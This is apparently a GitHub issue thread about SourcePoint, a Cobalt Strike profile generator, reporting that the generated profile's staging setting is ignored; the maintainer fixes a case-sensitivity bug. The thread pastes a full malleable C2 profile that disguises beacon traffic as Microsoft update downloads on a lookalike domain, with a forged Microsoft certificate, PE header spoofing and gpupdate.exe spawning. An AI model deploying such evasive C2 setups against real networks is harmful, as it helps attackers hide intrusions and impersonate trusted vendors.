Closed monpolo closed 3 years ago
Tinkered around a bit, if I comment out the first line so it's
It works just fine now. Again, could very well be a silly mistake on my part but from how I'm interpreting your readme it seems this is unexpected behavior.
Looks like it's a case-sensitivity issue. I will update it tonight and close this ticket once the new version is pushed. Thank you for letting me know.
Fixed in version 1.2
This is from the latest version of Cobalt Strike, downloaded today. Quite possibly user error but I'd appreciate any insights you could provide.
Generating Profile:
┌──(kali㉿kali)-[~/Desktop/SourcePoint-main] └─$ ./SourcePoint -Injector NtMapViewOfSection -Host 0012eb.lwindowsupdate.com -Jitter 20 -Outfile teststage2.profile -Stage True -PE_Clone 12 -PostEX_Name 11 -Profile 1 -Useragent Win10Chrome
[] Preparing Varibles... [] Building Profile... [!] Host Staging Is Enabled - Staged Payloads Are Available But Your Beacon Payload Is Available To Anyone That Connects To Your Server To Request It [] Post-Ex Process Name: gpupdate.exe [] Seleted Profile: WindowsUpdate [+] Profile Generated: teststage2.profile [+] Happy Hacking
Starting CS says
┌──(kali㉿kali)-[~/Desktop/cs-1/cobaltstrike] └─$ sudo ./teamserver 192.168.2.200 password ./teststage2.profile
[] Will use existing X509 certificate and keystore (for SSL) [+] I see you're into threat replication. ./teststage2.profile loaded. [] Loading properties file (/home/kali/Desktop/cs-1/cobaltstrike/TeamServer.prop). [!] Properties file (/home/kali/Desktop/cs-1/cobaltstrike/TeamServer.prop) was not found. [!] Woah! Your profile disables hosted payload stages. Payload staging won't work. [+] Team server is up on 0.0.0.0:50050 [*] SHA256 hash of SSL cert is:
Output from teststage2.profile
set host_stage "True"; set sleeptime "44000"; set jitter "20"; set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36";
set data_jitter "50"; set smb_frame_header ""; set pipename "plugplay+3850"; set pipename_stager "plugplay+1395";
set tcp_frame_header ""; set ssh_banner "Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-1029-aws x86_64)"; set ssh_pipename "plugplay+##";
Manaully add these if your doing C2 over DNS (Future Release)
dns-beacon {
set dns_idle "1.2.3.4";
set dns_max_txt "199";
set dns_sleep "1";
set dns_ttl "5";
set maxdns "200";
set dns_stager_prepend "doc-stg-prepend";
set dns_stager_subhost "doc-stg-sh.";
set beacon "doc.bc.";
set get_A "doc.1a.";
set get_AAAA "doc.4a.";
set get_TXT "doc.tx.";
set put_metadata "doc.md.";
set put_output "doc.po.";
set ns_response "zero";
}
stage { set obfuscate "true"; set stomppe "true"; set cleanup "true"; set userwx "false"; set smartinject "true";
set checksum "0"; set compile_time "05 Jun 2028 09:16:06"; set entry_point "229200"; set image_size_x86 "397312"; set image_size_x64 "397312"; set name "Windows.System.Diagnostics.dll"; set rich_header "\x56\xb8\x3f\x82\x12\xd9\x51\xd1\x12\xd9\x51\xd1\x12\xd9\x51\xd1\x1b\xa1\xc2\xd1\x7b\xd9\x51\xd1\x49\xb1\x55\xd0\x19\xd9\x51\xd1\x49\xb1\x52\xd0\x11\xd9\x51\xd1\x49\xb1\x54\xd0\x0c\xd9\x51\xd1\x12\xd9\x50\xd1\x0f\xdc\x51\xd1\x49\xb1\x50\xd0\x1a\xd9\x51\xd1\x49\xb1\x51\xd0\x13\xd9\x51\xd1\x49\xb1\x58\xd0\x3f\xd9\x51\xd1\x49\xb1\xac\xd1\x13\xd9\x51\xd1\x49\xb1\xae\xd1\x13\xd9\x51\xd1\x49\xb1\x53\xd0\x13\xd9\x51\xd1\x52\x69\x63\x68\x12\xd9\x51\xd1\x00\x00\x00\x00\x00\x00\x00\x00";
}
process-inject {
set remote memory allocation technique
}
post-ex {
control the temporary process we spawn to
set spawnto_x86 "%windir%\syswow64\gpupdate.exe"; set spawnto_x64 "%windir%\sysnative\gpupdate.exe";
}
http-get { set uri "/c/msdownload/update/others/2019/12/7jJw9JrTrLDNfSeO3i ";
client {
}
server { header "Content-Type" "application/vnd.ms-cab-compressed"; header "Server" "Microsoft-IIS/8.5"; header "MSRegion" "N. America"; header "Connection" "keep-alive"; header "X-Powered-By" "ASP.NET";
} }
http-post { set uri "/c/msdownload/update/others/2019/12/b4v2CKdyaMF33ftBarW-faotz ";
set verb "GET";
client {
}
server { header "Content-Type" "application/vnd.ms-cab-compressed"; header "Server" "Microsoft-IIS/8.5"; header "MSRegion" "N. America"; header "Connection" "keep-alive"; header "X-Powered-By" "ASP.NET";
} }
http-stager { server { header "Content-Type" "application/vnd.ms-cab-compressed"; } }
https-certificate { set CN "0012eb.lwindowsupdate.com"; #Common Name set O "Microsoft Corporation"; #Organization Name set C "US"; #Country set L "Redmond"; #Locality set OU "Microsoft IT"; #Organizational Unit Name set ST "WA"; #State or Province set validity "365"; #Number of days the cert is valid for }